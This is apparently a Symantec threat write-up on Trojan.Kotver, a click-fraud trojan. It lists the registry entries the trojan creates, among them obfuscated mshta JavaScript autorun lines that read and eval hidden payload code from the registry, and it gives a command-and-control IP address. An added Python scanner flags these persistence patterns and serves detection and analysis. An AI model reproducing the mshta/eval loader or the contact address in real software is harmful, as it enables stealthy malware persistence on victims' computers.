Trojan.Kotver
First posted on 04 September 2015.
Source: Symantec
Aliases:
There are no other names known for Trojan.Kotver.
Explanation:
Once executed, the Trojan checks if Windows PowerShell is installed on the compromised computer.
If Windows PowerShell is installed, the Trojan creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[NULL + RANDOM STRING]" = "mshta javascript:wwlOHC65KM="uXj2QEAC";NM5=new%20ActiveXObject("WScript.Shell");RszKM5eTb="U";F4YWS=NM5.RegRead("HKCU\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");lDvoGb3z="o";eval(F4YWS);HrZ3hVK="Psl35";"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"[NULL + RANDOM STRING]" = "mshta javascript:KEbIgF4p="dnwnhF";B4P=new%20ActiveXObject("WScript.Shell");ZdBYB2Py="q68xEps";cYpW8=B4P.RegRead("HKLM\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");rsWpcm30K="TPpkXXrp";eval(cYpW8);oebADA6Vl="e";"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[NULL + RANDOM STRING]" = "mshta javascript:mjLCq16YM="JIl7";Q1C3=new%20ActiveXObject("WScript.Shell");sVpI8GP4gh="fJmAajd";X7DHa=Q1C3.RegRead("HKLM\\software\\[RANDOM ALPHANUMERIC STRING]\\[RANDOM ALPHANUMERIC STRING]");iItYI32g="4UOKOVkou8";eval(X7DHa);DeLKKD2I="roo";"
HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[ENCRYPTED EXECUTABLE BINARY DATA]"
HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[SECOND LOADER SCRIPT]"
HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[ENCRYPTED EXECUTABLE BINARY DATA]"
HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "[SECOND LOADER SCRIPT]"
If the compromised computer does not have Windows PowerShell installed, the Trojan will create a copy of itself in the following location:
%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe
The Trojan will then create the following registry entries:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[DEFAULT]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"[DEFAULT]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"
HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
HKEY_CURRENT_USER\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"
HKEY_LOCAL_MACHINE\SOFTWARE\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"
HKEY_CURRENT_USER\Software\[RANDOM ALPHANUMERIC STRING]\"[RANDOM ALPHANUMERIC STRING]" = "%UserProfile%\Application Data\[RANDOM FOLDER NAME]\[RANDOM FILE NAME].exe"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"iexplore.exe" = "22B8"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"iexplore.exe" = "22B8"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"regsvr32.exe" = "22B8"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"regsvr32.exe" = "22B8"
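As an added defender-side example (not part of the Symantec write-up), the following Python scanner walks registry entries written in the KEY\"NAME" = "VALUE" layout used above and flags the two persistence tells this description gives: an autorun value that starts mshta with inline JavaScript which reads and evals registry data, and FEATURE_BROWSER_EMULATION being set for the non-browser host regsvr32.exe. All sample key paths, value names and values below are constructed.

```python
import re

# Constructed sample lines in the KEY\"NAME" = "VALUE" layout the write-up uses
# (not a real registry export). Names and values are invented; the write-up's
# [RANDOM ...] placeholders are replaced with short made-up strings.
SAMPLE_ENTRIES = [
    r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"Xq9" = "mshta javascript:a="b";s=new%20ActiveXObject("WScript.Shell");v=s.RegRead("HKCU\\software\\k1\\k2");eval(v);"',
    r'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"Zt4" = "mshta javascript:x=new%20ActiveXObject("WScript.Shell");eval(x.RegRead("HKLM\\software\\k3\\k4"));"',
    r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"regsvr32.exe" = "22B8"',
    r'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\"iexplore.exe" = "22B8"',
    r'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"Updater" = "C:\Program Files\Vendor\updater.exe /quiet"',
]

ENTRY_RE = re.compile(r'^(?P<key>.+?)\\"(?P<name>[^"]*)" = "(?P<value>.*)"$')
RUN_KEY_SUFFIXES = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\currentversion\policies\explorer\run",
)
# Script-host indicators from the write-up's Run values: mshta running inline
# JavaScript that pulls its real payload out of the registry and evals it.
LOADER_MARKERS = ("new%20activexobject", "regread(", "eval(")


def parse_entry(line):
    """Split one KEY\\"NAME" = "VALUE" line into (key, name, value), or None."""
    m = ENTRY_RE.match(line.strip())
    return (m.group("key"), m.group("name"), m.group("value")) if m else None


def classify(key, name, value):
    """Return the reasons an entry matches the Kotver persistence pattern."""
    k, v, reasons = key.lower(), value.lower(), []
    if k.endswith(RUN_KEY_SUFFIXES) and v.startswith("mshta") and "javascript:" in v:
        reasons.append("autorun launches mshta with inline javascript")
        hits = [mk for mk in LOADER_MARKERS if mk in v]
        if hits:
            reasons.append("script reads and evals registry data: " + ", ".join(hits))
    # iexplore.exe legitimately gets this value; a regsvr32.exe entry does not.
    if k.endswith(r"\featurecontrol\feature_browser_emulation") and name.lower() == "regsvr32.exe":
        reasons.append("browser emulation mode set for non-browser host regsvr32.exe")
    return reasons


def scan(lines):
    """Return [(key, name, reasons)] for every entry that triggered a rule."""
    findings = []
    for line in lines:
        parsed = parse_entry(line)
        if parsed:
            reasons = classify(*parsed)
            if reasons:
                findings.append((parsed[0], parsed[1], reasons))
    return findings
```

Running `scan(SAMPLE_ENTRIES)` reports the two mshta autoruns and the regsvr32.exe emulation entry, and leaves the iexplore.exe entry and the ordinary updater autorun alone.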
The Trojan injects itself into the following Windows process:
regsvr32.exe
Next, the Trojan connects to the following remote location:
[http://]155.94.67.5/uploa[REMOVED]
The Trojan may download additional software onto the compromised computer, such as the following:
Microsoft .NET Runtime
Microsoft Internet Explorer
Adobe Flash Player
The Trojan then performs click-fraud operations, which involve covertly downloading large numbers of online advertisements onto the compromised computer and automatically clicking or interacting with them with a view to earning fraudulent advertising revenue for the attacker.
Last update 04 September 2015